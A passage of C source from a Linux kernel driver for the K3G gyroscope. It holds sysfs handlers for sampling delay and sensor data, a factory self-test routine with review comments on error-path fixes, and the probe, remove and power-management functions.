	int x = -1, y = -1, z = -1;

	if (k3g_data->enable) {
		x = k3g_gyro_data[0];
		y = k3g_gyro_data[1];
		z = k3g_gyro_data[2];
	}

	if (DEBUG_DEBUG_SYSFS & debug_mask)
		printk(KERN_INFO "%s: %d, %d, %d\n", __func__, x, y, z);

	return sprintf(buf, "%d %d %d\n", x, y, z);
}
/* sysfs read of the effective sampling delay in nanoseconds:
 * per-sample read time multiplied by the batched FIFO entry count,
 * normalized through the ktime round-trip. */
static ssize_t k3g_show_delay(struct device *dev,
			      struct device_attribute *attr, char *buf)
{
	struct k3g_data *data = dev_get_drvdata(dev);
	u64 total_ns;

	if (DEBUG_FUNC_TRACE & debug_mask)
		printk(KERN_INFO "%s: line %d\n", __func__, __LINE__);

	total_ns = data->time_to_read * data->entries;
	total_ns = ktime_to_ns(ns_to_ktime(total_ns));

	return sprintf(buf, "%lld\n", total_ns);
}
/* sysfs write of the requested delay in nanoseconds. Picks the nearest
 * supported ODR at or below the request, or batches multiple 105Hz
 * samples per FIFO watermark for slower rates, reprograms CTRL_REG1 if
 * the ODR changed, and restarts the FIFO and timer/IRQ. */
static ssize_t k3g_set_delay(struct device *dev,
			     struct device_attribute *attr, const char *buf, size_t size)
{
	struct k3g_data *k3g_data = dev_get_drvdata(dev);
	int odr_value = ODR105_BW25;
	int res = 0;
	int i;
	u64 delay_ns;
	u8 ctrl;

	if (DEBUG_FUNC_TRACE & debug_mask)
		printk(KERN_INFO "%s: line %d\n", __func__, __LINE__);

	/* NOTE(review): strict_strtoll takes a signed long long* while
	 * delay_ns is u64 — confirm this pointer-type mismatch is benign
	 * on all supported ABIs. */
	res = strict_strtoll(buf, 10, &delay_ns);
	if (res < 0)
		return res;

	if (DEBUG_FUNC_TRACE & debug_mask)
		printk(KERN_INFO "%s: line %d\n", __func__, __LINE__);

	mutex_lock(&k3g_data->lock);

	/* quiesce sampling while the rate is being changed */
	if (!k3g_data->interruptible)
		hrtimer_cancel(&k3g_data->timer);
	else
		disable_irq(k3g_data->client->irq);

	/* round to the nearest supported ODR that is less than
	 * the requested value
	 */
	for (i = 0; i < ARRAY_SIZE(odr_delay_table); i++)
		if (delay_ns <= odr_delay_table[i].delay_ns) {
			odr_value = odr_delay_table[i].odr;
			delay_ns = odr_delay_table[i].delay_ns;
			k3g_data->time_to_read = delay_ns;
			k3g_data->entries = 1;
			break;
		}

	/* slower than the slowest ODR (105Hz): keep 105Hz and batch
	 * multiple FIFO entries per report instead */
	if (delay_ns >= odr_delay_table[3].delay_ns) {
		if (delay_ns >= MAX_DELAY) {
			k3g_data->entries = MAX_ENTRY;
			delay_ns = MAX_DELAY;
		} else {
			do_div(delay_ns, odr_delay_table[3].delay_ns);
			k3g_data->entries = delay_ns;
		}
		k3g_data->time_to_read = odr_delay_table[3].delay_ns;
	}

	/* reprogram CTRL_REG1 only when the ODR bits actually change */
	if (odr_value != (k3g_data->ctrl_regs[0] & ODR_MASK)) {
		ctrl = (k3g_data->ctrl_regs[0] & ~ODR_MASK);
		ctrl |= odr_value;
		k3g_data->ctrl_regs[0] = ctrl;
		res = i2c_smbus_write_byte_data(k3g_data->client,
						CTRL_REG1, ctrl);
	}

	/* we see a noise in the first sample or two after we
	 * change rates. this delay helps eliminate that noise.
	 */
	msleep((u32)delay_ns * 2 / NSEC_PER_MSEC);

	/* (re)start fifo */
	k3g_restart_fifo(k3g_data);

	if (!k3g_data->interruptible) {
		delay_ns = k3g_data->entries * k3g_data->time_to_read;
		k3g_data->polling_delay = ns_to_ktime(delay_ns);
		if (k3g_data->enable)
			hrtimer_start(&k3g_data->timer,
				      k3g_data->polling_delay, HRTIMER_MODE_REL);
	} else {
		enable_irq(k3g_data->client->irq);
	}

	mutex_unlock(&k3g_data->lock);
	return size;
}
#ifdef SELF_TEST_ENABLED
/* Result of the most recent factory self-test run (true = pass). */
bool st_result = false;
/* sysfs read of the last self-test verdict: "1\n" pass, "0\n" fail. */
static ssize_t k3g_show_st_result(struct device *dev,
				  struct device_attribute *attr, char *buf)
{
	if (DEBUG_DEV_STATUS & debug_mask)
		printk(KERN_INFO "%s: st_result(%d)\n", __func__, st_result);

	return sprintf(buf, "%d\n", st_result);
}
/* Number of samples averaged in each self-test phase. */
#define NUM_SAMPLE 5
/* Absolute value for signed integer expressions. */
#define K3G_ABS(a) (((a)<0)?-(a):(a))
/* sysfs 'store' handler that runs the K3G hardware self test
 * (datasheet procedure): average NUM_SAMPLE readings with self test
 * disabled, enable the self-test actuation, average again, and check
 * that the per-axis delta (scaled by SENSITIVITY/1000) lies within the
 * factory limits MIN/MAX_ST_{X,Y,Z}.
 *
 * The verdict is stored in the st_result global (read back via
 * k3g_show_st_result). Returns 'size' on success, negative errno on
 * I2C failure.
 *
 * Fixes vs. previous revision:
 *  - error messages now name the register/value actually being written
 *    (they were copy-pasted from the CTRL_REG5 write);
 *  - the sensor-disable writes at exit_self_test no longer clobber a
 *    prior error code, so a failed test cannot return success.
 */
static ssize_t k3g_run_self_test(struct device *dev,
		struct device_attribute *attr, const char *buf, size_t size)
{
	int err = 0, i = 0, j = 0, tmp1 = 0, tmp2 = 0;
	int cleanup_err;
	bool ret = 0;
	struct i2c_client *client = to_i2c_client(dev);
	struct k3g_data *k3g_data = i2c_get_clientdata(client);
	struct k3g_platform_data *pdata;
	/* raw samples and accumulators with self test off ("nost")... */
	int out_nost_x[NUM_SAMPLE], out_nost_y[NUM_SAMPLE], out_nost_z[NUM_SAMPLE];
	int avg_out_nost_x = 0, avg_out_nost_y = 0, avg_out_nost_z = 0, sum_nost_x = 0, sum_nost_y = 0, sum_nost_z = 0;
	/* ...and with self test on ("st") */
	int out_st_x[NUM_SAMPLE], out_st_y[NUM_SAMPLE], out_st_z[NUM_SAMPLE];
	int avg_out_st_x = 0, avg_out_st_y = 0, avg_out_st_z = 0, sum_st_x = 0, sum_st_y = 0, sum_st_z = 0;

	mutex_lock(&k3g_data->lock);
	pdata = client->dev.platform_data;
	if (pdata == NULL) {
		dev_err(&client->dev,
			"failed to read platform data\n");
		err = -ENOMEM;
		goto exit_self_test;
	}
	/* 1. Initialize/Turn on/enable Sensor - set BDU=1, ODR=200HZ, Cut-Off Freq=5-Hz, FS=2000dps */
	err = i2c_smbus_write_byte_data(k3g_data->client, CTRL_REG1, 0x6f);
	if (err < 0) {
		err = -EIO;
		printk(KERN_ERR "[%s, %d] Error during writing 0x6f on CTRL_REG1\n", TAG_ST, __LINE__);
		goto exit_self_test;
	}
	err = i2c_smbus_write_byte_data(k3g_data->client, CTRL_REG2, 0x00);
	if (err < 0) {
		err = -EIO;
		printk(KERN_ERR "[%s, %d] Error during writing 0x00 on CTRL_REG2\n", TAG_ST, __LINE__);
		goto exit_self_test;
	}
	err = i2c_smbus_write_byte_data(k3g_data->client, CTRL_REG3, 0x00);
	if (err < 0) {
		err = -EIO;
		printk(KERN_ERR "[%s, %d] Error during writing 0x00 on CTRL_REG3\n", TAG_ST, __LINE__);
		goto exit_self_test;
	}
	err = i2c_smbus_write_byte_data(k3g_data->client, CTRL_REG4, 0xa0);
	if (err < 0) {
		err = -EIO;
		printk(KERN_ERR "[%s, %d] Error during writing 0xa0 on CTRL_REG4\n", TAG_ST, __LINE__);
		goto exit_self_test;
	}
	err = i2c_smbus_write_byte_data(k3g_data->client, CTRL_REG5, 0x02);
	if (err < 0) {
		err = -EIO;
		printk(KERN_ERR "[%s, %d] Error during writing 0x02 on CTRL_REG5\n", TAG_ST, __LINE__);
		goto exit_self_test;
	}
	/* 2. Power up, wait for 800ms for stable output */
	if (pdata->power_on) {
		pdata->power_on(1 << SENSOR_TYPE_GYROSCOPE);
		mdelay(800);
	}
	/* 3a. Collect NUM_SAMPLE readings with self test disabled.
	 * NOTE(review): this polls ZYXDA with no retry limit - if the part
	 * never raises data-ready the loop spins forever; confirm a bound
	 * is not required here. */
	while (i < NUM_SAMPLE) {
		tmp1 = 0;
		tmp2 = 0;
		if (i2c_smbus_read_byte_data(k3g_data->client, STATUS_REG) & ZYXDA_MASK) {
			if (DEBUG_DEV_STATUS & debug_mask)
				printk(KERN_INFO "[%s, %d] NOST read data #%d\n", TAG_ST, __LINE__, i);
			/* assemble 16-bit two's-complement samples from L/H register pairs */
			tmp1 = i2c_smbus_read_byte_data(k3g_data->client, OUT_X_L);
			tmp2 = i2c_smbus_read_byte_data(k3g_data->client, OUT_X_H);
			out_nost_x[i] = (tmp2 << 8) | tmp1;
			if (0x8000 & out_nost_x[i])
				out_nost_x[i] = (0x10000 - out_nost_x[i]) * (-1);
			tmp1 = i2c_smbus_read_byte_data(k3g_data->client, OUT_Y_L);
			tmp2 = i2c_smbus_read_byte_data(k3g_data->client, OUT_Y_H);
			out_nost_y[i] = (tmp2 << 8) | tmp1;
			if (0x8000 & out_nost_y[i])
				out_nost_y[i] = (0x10000 - out_nost_y[i]) * (-1);
			tmp1 = i2c_smbus_read_byte_data(k3g_data->client, OUT_Z_L);
			tmp2 = i2c_smbus_read_byte_data(k3g_data->client, OUT_Z_H);
			out_nost_z[i] = (tmp2 << 8) | tmp1;
			if (0x8000 & out_nost_z[i])
				out_nost_z[i] = (0x10000 - out_nost_z[i]) * (-1);
			i++;
		} else {
			if (DEBUG_DEV_STATUS & debug_mask)
				printk(KERN_INFO "[%s, %d] NOST ZYXDA ready bit is not set\n", TAG_ST, __LINE__);
			mdelay(1);
		}
	}
	/* calculate avg values for nost */
	for (i = 0; i < NUM_SAMPLE; i++) {
		sum_nost_x += out_nost_x[i];
		sum_nost_y += out_nost_y[i];
		sum_nost_z += out_nost_z[i];
		if (DEBUG_DEV_STATUS & debug_mask) {
			printk(KERN_INFO "[%s, %d] sum_nost_x=(%d), out_nost_x[%d]=(%d)\n", TAG_ST, __LINE__, sum_nost_x, i, out_nost_x[i]);
			printk(KERN_INFO "[%s, %d] sum_nost_y=(%d), out_nost_y[%d]=(%d)\n", TAG_ST, __LINE__, sum_nost_y, i, out_nost_y[i]);
			printk(KERN_INFO "[%s, %d] sum_nost_z=(%d), out_nost_z[%d]=(%d)\n", TAG_ST, __LINE__, sum_nost_z, i, out_nost_z[i]);
		}
	}
	avg_out_nost_x = sum_nost_x / NUM_SAMPLE;
	avg_out_nost_y = sum_nost_y / NUM_SAMPLE;
	avg_out_nost_z = sum_nost_z / NUM_SAMPLE;
	if (DEBUG_DEV_STATUS & debug_mask)
		printk(KERN_INFO "[%s, %d] avg_out_nost_x(%d), avg_out_nost_y(%d), avg_out_nost_z(%d)\n", TAG_ST, __LINE__, avg_out_nost_x, avg_out_nost_y, avg_out_nost_z);
	/* 3b. Enable Self Test (CTRL_REG4: FS=2000dps + ST bits) */
	err = i2c_smbus_write_byte_data(k3g_data->client, CTRL_REG4, 0xa2);
	if (err < 0) {
		err = -EIO;
		printk(KERN_ERR "[%s, %d] Error during writing 0xa2 on CTRL_REG4\n", TAG_ST, __LINE__);
		goto exit_self_test;
	}
	mdelay(50);
	/* collect NUM_SAMPLE readings with self test enabled */
	while (j < NUM_SAMPLE) {
		tmp1 = 0;
		tmp2 = 0;
		if (i2c_smbus_read_byte_data(k3g_data->client, STATUS_REG) & ZYXDA_MASK) {
			if (DEBUG_DEV_STATUS & debug_mask)
				printk(KERN_INFO "[%s, %d] ST read data #%d\n", TAG_ST, __LINE__, j);
			tmp1 = i2c_smbus_read_byte_data(k3g_data->client, OUT_X_L);
			tmp2 = i2c_smbus_read_byte_data(k3g_data->client, OUT_X_H);
			out_st_x[j] = (tmp2 << 8) | tmp1;
			if (0x8000 & out_st_x[j])
				out_st_x[j] = (0x10000 - out_st_x[j]) * (-1);
			tmp1 = i2c_smbus_read_byte_data(k3g_data->client, OUT_Y_L);
			tmp2 = i2c_smbus_read_byte_data(k3g_data->client, OUT_Y_H);
			out_st_y[j] = (tmp2 << 8) | tmp1;
			if (0x8000 & out_st_y[j])
				out_st_y[j] = (0x10000 - out_st_y[j]) * (-1);
			tmp1 = i2c_smbus_read_byte_data(k3g_data->client, OUT_Z_L);
			tmp2 = i2c_smbus_read_byte_data(k3g_data->client, OUT_Z_H);
			out_st_z[j] = (tmp2 << 8) | tmp1;
			if (0x8000 & out_st_z[j])
				out_st_z[j] = (0x10000 - out_st_z[j]) * (-1);
			j++;
		} else {
			if (DEBUG_DEV_STATUS & debug_mask)
				printk(KERN_INFO "[%s, %d] ST ZYXDA ready bit is not set\n", TAG_ST, __LINE__);
			mdelay(1);
		}
	}
	/* calculate avg values for st */
	for (j = 0; j < NUM_SAMPLE; j++) {
		sum_st_x += out_st_x[j];
		sum_st_y += out_st_y[j];
		sum_st_z += out_st_z[j];
		if (DEBUG_DEV_STATUS & debug_mask) {
			printk(KERN_INFO "[%s, %d] sum_st_x=(%d), out_st_x[%d]=(%d)\n", TAG_ST, __LINE__, sum_st_x, j, out_st_x[j]);
			printk(KERN_INFO "[%s, %d] sum_st_y=(%d), out_st_y[%d]=(%d)\n", TAG_ST, __LINE__, sum_st_y, j, out_st_y[j]);
			printk(KERN_INFO "[%s, %d] sum_st_z=(%d), out_st_z[%d]=(%d)\n", TAG_ST, __LINE__, sum_st_z, j, out_st_z[j]);
		}
	}
	avg_out_st_x = sum_st_x / NUM_SAMPLE;
	avg_out_st_y = sum_st_y / NUM_SAMPLE;
	avg_out_st_z = sum_st_z / NUM_SAMPLE;
	if (DEBUG_DEV_STATUS & debug_mask)
		printk(KERN_INFO "[%s, %d] avg_out_st_x(%d), avg_out_st_y(%d), avg_out_st_z(%d)\n",
			TAG_ST, __LINE__, avg_out_st_x, avg_out_st_y, avg_out_st_z);
	/* 4. decide pass/fail: scaled |ST - NOST| must fall inside the
	 * per-axis factory window; fail fast on the first axis out of range */
	{
		int tmpx = 0, tmpy = 0, tmpz = 0;

		tmpx = K3G_ABS(avg_out_st_x - avg_out_nost_x) * SENSITIVITY / 1000;
		if (DEBUG_DEV_STATUS & debug_mask)
			printk(KERN_INFO "[%s, %d] tmpx(%d)=(%d*0.001)*|avg_out_st_x(%d)-avg_out_nost_x(%d)|\n",
				TAG_ST, __LINE__, tmpx, SENSITIVITY, avg_out_st_x, avg_out_nost_x);
		if (MIN_ST_X <= tmpx && tmpx <= MAX_ST_X) {
			if (DEBUG_DEV_STATUS & debug_mask)
				printk(KERN_ERR "[%s, %d] Pass, ST_X, (%d)<=(%d)<=(%d)\n", TAG_ST, __LINE__, MIN_ST_X, tmpx, MAX_ST_X);
			ret = true;
		} else {
			printk(KERN_ERR "[%s, %d] False, ST_X, (%d)<=(%d)<=(%d)\n", TAG_ST, __LINE__, MIN_ST_X, tmpx, MAX_ST_X);
			ret = false;
			goto exit_self_test;
		}
		tmpy = K3G_ABS(avg_out_st_y - avg_out_nost_y) * SENSITIVITY / 1000;
		if (DEBUG_DEV_STATUS & debug_mask)
			printk(KERN_INFO "[%s, %d] tmpy(%d)=(%d*0.001)*|avg_out_st_y(%d)-avg_out_nost_y(%d)|\n",
				TAG_ST, __LINE__, tmpy, SENSITIVITY, avg_out_st_y, avg_out_nost_y);
		if (MIN_ST_Y <= tmpy && tmpy <= MAX_ST_Y) {
			if (DEBUG_DEV_STATUS & debug_mask)
				printk(KERN_ERR "[%s, %d] Pass, ST_Y, (%d)<=(%d)<=(%d)\n", TAG_ST, __LINE__, MIN_ST_Y, tmpy, MAX_ST_Y);
			ret = true;
		} else {
			printk(KERN_ERR "[%s, %d] False, ST_Y, (%d)<=(%d)<=(%d)\n", TAG_ST, __LINE__, MIN_ST_Y, tmpy, MAX_ST_Y);
			ret = false;
			goto exit_self_test;
		}
		tmpz = K3G_ABS(avg_out_st_z - avg_out_nost_z) * SENSITIVITY / 1000;
		if (DEBUG_DEV_STATUS & debug_mask)
			printk(KERN_INFO "[%s, %d] tmpz(%d)=(%d*0.001)*|avg_out_st_z(%d)-avg_out_nost_z(%d)|\n",
				TAG_ST, __LINE__, tmpz, SENSITIVITY, avg_out_st_z, avg_out_nost_z);
		if (MIN_ST_Z <= tmpz && tmpz <= MAX_ST_Z) {
			if (DEBUG_DEV_STATUS & debug_mask)
				printk(KERN_ERR "[%s, %d] Pass, ST_Z, (%d)<=(%d)<=(%d)\n", TAG_ST, __LINE__, MIN_ST_Z, tmpz, MAX_ST_Z);
			ret = true;
		} else {
			printk(KERN_ERR "[%s, %d] False, ST_Z, (%d)<=(%d)<=(%d)\n", TAG_ST, __LINE__, MIN_ST_Z, tmpz, MAX_ST_Z);
			ret = false;
			goto exit_self_test;
		}
	}
	printk(KERN_INFO "[%s, %d] Finally Pass!!!\n", TAG_ST, __LINE__);
	ret = true;
exit_self_test:
	/* Disable Sensor. Use a separate variable so a cleanup failure does
	 * not overwrite (and a cleanup success does not erase) the error
	 * code of the test itself. */
	cleanup_err = i2c_smbus_write_byte_data(k3g_data->client, CTRL_REG1, 0x00);
	if (cleanup_err < 0) {
		if (!err)
			err = -EIO;
		printk(KERN_ERR "[%s, %d] exit: Error during writing 0x00 on CTRL_REG1\n", TAG_ST, __LINE__);
	}
	/* Disable Self Test */
	cleanup_err = i2c_smbus_write_byte_data(k3g_data->client, CTRL_REG4, 0x00);
	if (cleanup_err < 0) {
		if (!err)
			err = -EIO;
		printk(KERN_ERR "[%s, %d] exit: Error during writing 0x00 on CTRL_REG4\n", TAG_ST, __LINE__);
	}
	mutex_unlock(&k3g_data->lock);
	st_result = ret;
	return err ? err : size;
}
#endif
/* sysfs 'show' handler: print the number of reported samples, or -1
 * when the sensor is disabled so userspace can tell a stale count
 * from a live one. */
static ssize_t k3g_show_report_cnt(struct device *dev, struct device_attribute *attr, char *buf)
{
	struct k3g_data *k3g_data = dev_get_drvdata(dev);

	printk(KERN_INFO "%s: report_cnt: %d\n", __func__, report_cnt);
	return sprintf(buf, "%d\n", k3g_data->enable ? report_cnt : -1);
}
/* sysfs attributes: created individually on the input device in probe. */
static DEVICE_ATTR(enable, /*S_IRUGO | S_IWUSR | S_IWGRP,*/S_IRUGO|S_IWUSR,
		k3g_show_enable, k3g_set_enable);
static DEVICE_ATTR(poll_delay, /*S_IRUGO | S_IWUSR | S_IWGRP,*/S_IRUGO|S_IWUSR,
		k3g_show_delay, k3g_set_delay);
static DEVICE_ATTR(gyro_data, /*S_IRUGO | S_IWUSR | S_IWGRP,*/S_IRUGO|S_IWUSR,
		k3g_show_gyro_data, NULL);
static DEVICE_ATTR(gyro_cnt, /*S_IRUGO | S_IWUSR | S_IWGRP,*/S_IRUGO|S_IWUSR,
		k3g_show_report_cnt, NULL);
#ifdef SELF_TEST_ENABLED
static DEVICE_ATTR(self_test, S_IRUGO | S_IWUSR | S_IWGRP,
		k3g_show_st_result, k3g_run_self_test);
/* Attribute group registered on the i2c client device in probe.
 * NOTE(review): the whole array is only compiled when SELF_TEST_ENABLED
 * is defined, so the inner #ifdef below is redundant (always true). */
static struct attribute *k3g_attributes[] =
{
	&dev_attr_enable.attr,
	&dev_attr_poll_delay.attr,
#ifdef SELF_TEST_ENABLED
	&dev_attr_self_test.attr,
#endif
	&dev_attr_gyro_data.attr,
	&dev_attr_gyro_cnt.attr,
	NULL
};
static const struct attribute_group k3g_attr_group =
{
	.attrs = k3g_attributes,
};
#endif
/* Probe: verify the chip id, set up the input device, choose irq-driven
 * or hrtimer/workqueue polling, and create the sysfs attributes.
 *
 * Fixes vs. previous revision:
 *  - device_create_file() failures now set 'err' (they previously left
 *    err == 0, so probe reported success on those paths);
 *  - the cleanup label chain now removes exactly the files that were
 *    created (each label used to remove the file whose creation just
 *    failed, and poll_delay was never removed at all);
 *  - sysfs_create_group() failure no longer leaks 'data';
 *  - request_irq/create_workqueue failures now unregister the input
 *    device; error exits after group creation remove the group.
 */
static int k3g_probe(struct i2c_client *client,
		const struct i2c_device_id *devid)
{
	int ret;
	int err = 0;
	struct k3g_data *data;
	struct k3g_platform_data *pdata;
	struct input_dev *input_dev;

	pdata = client->dev.platform_data;
	if (pdata == NULL) {
		dev_err(&client->dev, "platform data is NULL. exiting.\n");
		err = -ENODEV;
		goto exit;
	}
	if (DEBUG_FUNC_TRACE & debug_mask)
		printk(KERN_INFO "%s: line %d", __func__, __LINE__);
	k3g_i2c_client = client;
	data = kzalloc(sizeof(*data), GFP_KERNEL);
	if (data == NULL) {
		dev_err(&client->dev,
			"failed to allocate memory for module data\n");
		err = -ENOMEM;
		goto exit;
	}
	data->client = client;
	if (pdata->power_on) {
		if (DEBUG_FUNC_TRACE & debug_mask)
			printk(KERN_INFO "%s: line %d, call power_on", __func__, __LINE__);
		pdata->power_on(1<<SENSOR_TYPE_GYROSCOPE);
		mdelay(1);
	}
#ifdef SELF_TEST_ENABLED
	err = sysfs_create_group(&client->dev.kobj, &k3g_attr_group);
	if (err) {
		printk(KERN_ERR "Unable to do sysfs_create_group");
		goto err_sysfs_create_group;	/* was 'goto exit': leaked data */
	}
#endif
	/* read chip id */
	ret = i2c_smbus_read_byte_data(client, WHO_AM_I);
	if (ret != DEVICE_ID) {
		if (ret < 0) {
			pr_err("%s: i2c for reading chip id failed\n",
				__func__);
			err = ret;
		} else {
			pr_err("%s : Device identification failed\n",
				__func__);
			err = -ENODEV;
		}
		goto err_read_reg;
	}
	mutex_init(&data->lock);
	/* allocate gyro input_device */
	input_dev = input_allocate_device();
	if (!input_dev) {
		pr_err("%s: could not allocate input device\n", __func__);
		err = -ENOMEM;
		goto err_input_allocate_device;
	}
	data->input_dev = input_dev;
	input_set_drvdata(input_dev, data);
	input_dev->name = "gyroscope";
	/* NOTE(review): abs params are applied to EV_REL axes below -
	 * confirm userspace actually relies on these ranges. */
	/* X */
	input_set_capability(input_dev, EV_REL, REL_RX);
	input_set_abs_params(input_dev, REL_RX, -2048, 2047, 0, 0);
	/* Y */
	input_set_capability(input_dev, EV_REL, REL_RY);
	input_set_abs_params(input_dev, REL_RY, -2048, 2047, 0, 0);
	/* Z */
	input_set_capability(input_dev, EV_REL, REL_RZ);
	input_set_abs_params(input_dev, REL_RZ, -2048, 2047, 0, 0);
	err = input_register_device(input_dev);
	if (err < 0) {
		pr_err("%s: could not register input device\n", __func__);
		input_free_device(data->input_dev);
		goto err_input_register_device;
	}
	memcpy(&data->ctrl_regs, &default_ctrl_regs, sizeof(default_ctrl_regs));
	if (pdata->power_off) {
		if (DEBUG_FUNC_TRACE & debug_mask)
			printk(KERN_INFO "%s: line %d, call power_off", __func__, __LINE__);
		pdata->power_off(1<<SENSOR_TYPE_GYROSCOPE);
	}
	if (data->client->irq >= 0) {
		/* interrupt driven; irq stays disabled until the device is enabled */
		data->interruptible = true;
		err = request_threaded_irq(data->client->irq, NULL,
				k3g_interrupt_thread, IRQF_TRIGGER_HIGH|IRQF_ONESHOT,
				"k3g", data);
		if (err < 0) {
			pr_err("%s: can't allocate irq.\n", __func__);
			goto err_request_irq;
		}
		disable_irq(data->client->irq);
	} else {
		/* polling: hrtimer fires the work queue; the work thread does
		 * the (possibly blocking) i2c reads */
		u64 delay_ns;

		data->ctrl_regs[2] = 0x00;	/* disable interrupt */
		hrtimer_init(&data->timer, CLOCK_MONOTONIC, HRTIMER_MODE_REL);
		data->polling_delay = ns_to_ktime(10 * NSEC_PER_MSEC);
		data->time_to_read = 10000000LL;
		delay_ns = ktime_to_ns(data->polling_delay);
		do_div(delay_ns, data->time_to_read);
		data->entries = delay_ns;
		data->timer.function = k3g_timer_func;
		data->k3g_wq = create_singlethread_workqueue("k3g_wq");
		if (!data->k3g_wq) {
			err = -ENOMEM;
			pr_err("%s: could not create workqueue\n", __func__);
			goto err_create_workqueue;
		}
		INIT_WORK(&data->work, k3g_work_func);
	}
	/* create sysfs files; capture the error codes */
	err = device_create_file(&input_dev->dev, &dev_attr_enable);
	if (err < 0) {
		pr_err("Failed to create device file(%s)!\n",
			dev_attr_enable.attr.name);
		goto err_device_create_file;
	}
	err = device_create_file(&input_dev->dev, &dev_attr_poll_delay);
	if (err < 0) {
		pr_err("Failed to create device file(%s)!\n",
			dev_attr_poll_delay.attr.name);
		goto err_device_create_file2;
	}
#ifdef SELF_TEST_ENABLED
	err = device_create_file(&input_dev->dev, &dev_attr_self_test);
	if (err < 0) {
		pr_err("Failed to create device file(%s)!\n",
			dev_attr_self_test.attr.name);
		goto err_device_create_file3;
	}
#endif
	err = device_create_file(&input_dev->dev, &dev_attr_gyro_data);
	if (err < 0) {
		pr_err("Failed to create device file(%s)!\n",
			dev_attr_gyro_data.attr.name);
		goto err_device_create_file4;
	}
	err = device_create_file(&input_dev->dev, &dev_attr_gyro_cnt);
	if (err < 0) {
		pr_err("Failed to create device file(%s)!\n",
			dev_attr_gyro_cnt.attr.name);
		goto err_device_create_file8;
	}
#ifdef FILE_OPS
	err = misc_register(&k3g_misc_device);
	if (err < 0) {
		dev_err(&client->dev,
			"misc device register failed\n");
		goto err_misc_register;
	}
#endif
	i2c_set_clientdata(client, data);
	dev_set_drvdata(&input_dev->dev, data);
	return 0;

	/* unwind: each label releases what was acquired BEFORE the failing step */
#ifdef FILE_OPS
err_misc_register:
	device_remove_file(&input_dev->dev, &dev_attr_gyro_cnt);
#endif
err_device_create_file8:
	device_remove_file(&input_dev->dev, &dev_attr_gyro_data);
err_device_create_file4:
#ifdef SELF_TEST_ENABLED
	device_remove_file(&input_dev->dev, &dev_attr_self_test);
err_device_create_file3:
#endif
	device_remove_file(&input_dev->dev, &dev_attr_poll_delay);
err_device_create_file2:
	device_remove_file(&input_dev->dev, &dev_attr_enable);
err_device_create_file:
	if (data->interruptible) {
		enable_irq(data->client->irq);
		free_irq(data->client->irq, data);
	} else
		destroy_workqueue(data->k3g_wq);
err_create_workqueue:
err_request_irq:
	input_unregister_device(data->input_dev);
err_input_register_device:
err_input_allocate_device:
	mutex_destroy(&data->lock);
err_read_reg:
#ifdef SELF_TEST_ENABLED
	sysfs_remove_group(&client->dev.kobj, &k3g_attr_group);
err_sysfs_create_group:
#endif
	kfree(data);
exit:
	return err;
}
/* Remove: tear down everything probe created, in reverse order.
 * Fix vs. previous revision: the sysfs attribute group probe registers
 * on the i2c client (under SELF_TEST_ENABLED) was never removed here.
 */
static int k3g_remove(struct i2c_client *client)
{
	int err = 0;
	struct k3g_data *k3g_data = i2c_get_clientdata(client);

	device_remove_file(&k3g_data->input_dev->dev, &dev_attr_enable);
	device_remove_file(&k3g_data->input_dev->dev, &dev_attr_poll_delay);
	device_remove_file(&k3g_data->input_dev->dev, &dev_attr_gyro_data);
	device_remove_file(&k3g_data->input_dev->dev, &dev_attr_gyro_cnt);
#ifdef SELF_TEST_ENABLED
	device_remove_file(&k3g_data->input_dev->dev, &dev_attr_self_test);
	/* probe registered this group on the client device; balance it here */
	sysfs_remove_group(&client->dev.kobj, &k3g_attr_group);
#endif
#ifdef FILE_OPS
	misc_deregister(&k3g_misc_device);
#endif
	/* power-down the chip if it was running */
	if (k3g_data->enable)
		err = i2c_smbus_write_byte_data(k3g_data->client,
				CTRL_REG1, 0x00);
	if (k3g_data->interruptible) {
		if (!k3g_data->enable) /* no disable_irq before free_irq */
			enable_irq(k3g_data->client->irq);
		free_irq(k3g_data->client->irq, k3g_data);
	} else {
		hrtimer_cancel(&k3g_data->timer);
		cancel_work_sync(&k3g_data->work);
		destroy_workqueue(k3g_data->k3g_wq);
	}
	input_unregister_device(k3g_data->input_dev);
	mutex_destroy(&k3g_data->lock);
	kfree(k3g_data);
	return err;
}
/* PM suspend: stop the polling machinery, put the chip in power-down
 * (CTRL_REG1 = 0) and cut power via the platform callback.
 * NOTE(review): in irq mode the irq is left enabled across suspend -
 * confirm the platform expects that. */
static int k3g_suspend(struct device *dev)
{
	int err = 0;
	struct i2c_client *client = to_i2c_client(dev);
	struct k3g_data *k3g_data = i2c_get_clientdata(client);
	struct k3g_platform_data *pdata;

	if (DEBUG_FUNC_TRACE & debug_mask)
		printk(KERN_INFO "%s: line %d\n", __func__, __LINE__);
	pdata = client->dev.platform_data;
	if (k3g_data->enable) {
		mutex_lock(&k3g_data->lock);
		/* polling mode: make sure no timer/work touches i2c after this */
		if (!k3g_data->interruptible) {
			hrtimer_cancel(&k3g_data->timer);
			cancel_work_sync(&k3g_data->work);
			flush_workqueue(k3g_data->k3g_wq);
		}
		/* power-down the gyro core */
		err = i2c_smbus_write_byte_data(k3g_data->client,
				CTRL_REG1, 0x00);
		mutex_unlock(&k3g_data->lock);
	}
	if (pdata->power_off) {
		if (DEBUG_GEN_INFO & debug_mask)
			printk(KERN_INFO "%s: goes to suspend, power off\n", __func__);
		pdata->power_off(1<<SENSOR_TYPE_GYROSCOPE);
	}
	return err;
}
/* PM resume: restore power, and if the device was enabled before
 * suspend, restart the fifo/polling and rewrite the saved control
 * registers (CTRL_REG1..5 in one auto-increment burst).
 * NOTE(review): mdelay(300) busy-waits for 300ms inside resume -
 * msleep would be preferable here; confirm the settle time is needed. */
static int k3g_resume(struct device *dev)
{
	int err = 0;
	struct i2c_client *client = to_i2c_client(dev);
	struct k3g_data *k3g_data = i2c_get_clientdata(client);
	struct k3g_platform_data *pdata;

	if (DEBUG_FUNC_TRACE & debug_mask)
		printk(KERN_INFO "%s: line %d\n", __func__, __LINE__);
	pdata = client->dev.platform_data;
	if (pdata->power_on) {
		if (DEBUG_GEN_INFO & debug_mask)
			printk(KERN_INFO "%s: goes to resume, power on\n", __func__);
		pdata->power_on(1<<SENSOR_TYPE_GYROSCOPE);
		mdelay(1);
	}
	if (k3g_data->enable) {
		mutex_lock(&k3g_data->lock);
		mdelay(300);
		k3g_restart_fifo(k3g_data);
		/* polling mode: re-arm the hrtimer */
		if (!k3g_data->interruptible)
			hrtimer_start(&k3g_data->timer,
				k3g_data->polling_delay, HRTIMER_MODE_REL);
		/* AC sets the register auto-increment bit for the block write */
		err = i2c_smbus_write_i2c_block_data(client,
				CTRL_REG1 | AC, sizeof(k3g_data->ctrl_regs),
